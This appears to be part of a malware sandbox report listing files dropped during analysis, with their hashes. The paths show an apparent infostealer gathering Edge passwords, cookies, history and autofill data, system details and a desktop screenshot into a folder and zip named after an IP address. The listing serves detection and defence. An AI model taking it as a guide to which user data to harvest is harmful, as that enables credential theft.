SHA1 db30188de1f22e3077e7044be1386a5d0ecaed9d
SHA256 0768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b
SHA512 47828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

MD5 4786cf24e3e07c212272a4c2c0aa6aad
SHA1 6948ce944e1dde09aafee35b61b7fee15537a785
SHA256 01637344a86333f59012fe115b1be0a8366587e176809918a2723a6878a23cdc
SHA512 6434ad876770eb4bb9e91c4ebb206c41f3b4d0d715ec363c8669d4b595fdd740ac3004855d482c71588f1f7bd4762d427974a4fce31dc50ad633d84d4f132654

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

MD5 56220f7b661c85b776763c1a0f189326
SHA1 64e8d4898867dafa9de8b87862808a1ac05a1239
SHA256 6371d04275f796eebfdf9ab3c879f32a58af4cb04001598b8d109836b864b872
SHA512 3071338a1f5c80016f409105efd2367baa4f3742bdaaf41a97794f66670f246ff24f3c11c2fc26e5d33c17f33c3d19a2301fcf4be8ca239f0a903c3b8a2892db

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

MD5 4ae344179932dc8e2c6fe2079f9753ef
SHA1 60eacc624412b1f34809780769e3b212f138ea9c
SHA256 3063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4
SHA512 fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19

C:\Users\Admin\AppData\Local\Temp\212.102.63.147.zip

MD5 b077dab664a004215814a4391b6dde66
SHA1 c3c2f1138317225ae98f616b080370cefa082c18
SHA256 726afcaa627b24e176cec78f636df4a66847f0716ea0e1161745d0c5616b5bae
SHA512 2927dd7361048783dba4324def7859b72b415045272278064dbfb024251b22e899e7b4f603f2b59d312855a9674c6ad2d2068eee7811e7079bc00a91fc5cc247

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

MD5 368d379c84bd87dc5750b0a91088f604
SHA1 3949b00b0abddba67fe05fb8f1c02b22c519eca4
SHA256 75e31026665a23adfaebf4ab95f2f5e45f59500c0dcc762502bb4a234b5dbcbf
SHA512 9074f42972b6e523ba89528d3a6b147ca5cafedb16920a612306a6c9bb764dd09320fb8d05df1aa34e85d72e59ab32d537900dffb86a00aadceec4ddd94150cd

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Info.txt

MD5 20a03bf7481ae6484d0623abb566212c
SHA1 08e6067ea2ec07126473066a53855d1f743718bd
SHA256 44cdd1e35dba8a35672a3f58067b50932f4088298f5e1ecf9a448b3e73380ee7
SHA512 e3d12f0c103268ae5030345e38c49daa90f6e41c9d9b6294fe97fa0e0032c732682f6e27356ffbbf1611c3e8482dfccefc0859444d054fcbc3c826d649b8dd34

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgePasswords.txt

MD5 c4efd9a7b61ebf43b608440be5e33369
SHA1 926418256c277f1b11b575ec6e92ce6a844612f7
SHA256 ed4280859199da5a8f25c0c6d533d0873460ac63368c14a69bbd863ea4bfb30f
SHA512 9ea97363868d61d3d51bd3804d638b71ba8dc65260800b3a54051b4725cf08e9d9880a12422a549d94a339c7267e858a7ff5ca9428d64051657134b5c6c20745

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeHistory.txt

MD5 b80546283f231ee762dee4b33b0aa091
SHA1 ec5a0f5581d8d9e9784f82b77e4e0eb187d78301
SHA256 188352fe4a40938e0918eed1c4b0ae7266fb13c9de77330e04f192711d15c6f8
SHA512 df1519614443b80b22a601ca4f1b4119eeaef0715fe913dd327a7c247986cba16cbbd7f55e32ea0557b5e5338897c0f82ac23e91d69836ad280c7f587d863d51

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeCookies.txt

MD5 964d5571d9a4fec576fe454162f2e844
SHA1 6234d1102a5012094dc8818bc045f7890d270905
SHA256 6cfad5b342f80a79633747ee591775dbf46be34fbc793930e5de9aab7afb9995
SHA512 402b81b47e62fa0d2b993eb01df725d1f3ec826ed76c0ac17d5ebaed048e6c7556ac2e1b3c0141e2347386cb5c7c74377c37f990ba9b5745f388181153b8a46c

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeBookmarks.txt

MD5 c5b94f01b5b97e31f9cec28fecefe0b1
SHA1 5a2f650235d6319696f02a10a0393b47dbddcd81
SHA256 bf9eec15e97a4addb7f3b9a15f2de3b5499428750e3ecf1cbad5e3bad5e00548
SHA512 8e6a75963a9e613ee3a5fe4032c42898904426c19541ec54404811482ef8aac4f84ff23bd80d72f0d33215dcde7d008fcd4687c79ba35cac5b4240c5ad5b109b

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeAutoFill.txt

MD5 f19d961388cd1c4572942a4f1397d15d
SHA1 95a89992f4fe50c0a6f4351c3f93c14487087844
SHA256 052caba139f51903bc4994a3cace4e65c87fd093b6efec8141e4a6c4625e380d
SHA512 66a82f3216189a50df4ca19194a1eda2989e6635fc115508d9c0b2a33b3345f657a17214c52ed78999eb8a3e571199e70c3ae4854deaa7eb1f380af7f6f8fb09

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\DesktopScreenshot.png

MD5 3625ed17a6255827969ad5a404f0e41e
SHA1 87922c687d7c31aef6b20da03c4621b03a617028
SHA256 c7fcc119a5fcf6b96a186e837887c22c2d1b59de5fb3c263911843f9cc6b9be3
SHA512 4bd2de013dad5a094a3a28fe171fc0ebe97dfcda5413fc3d0d1f0aced57cc892d0a0835708e42cae720c71befa02604590638cc9ba2f4b260abf14b5d67bfc16

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\267aad0b-2fdd-4292-8bff-59b3a5d8a384.down_data

MD5 5683c0028832cae4ef93ca39c8ac5029
SHA1 248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512 aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3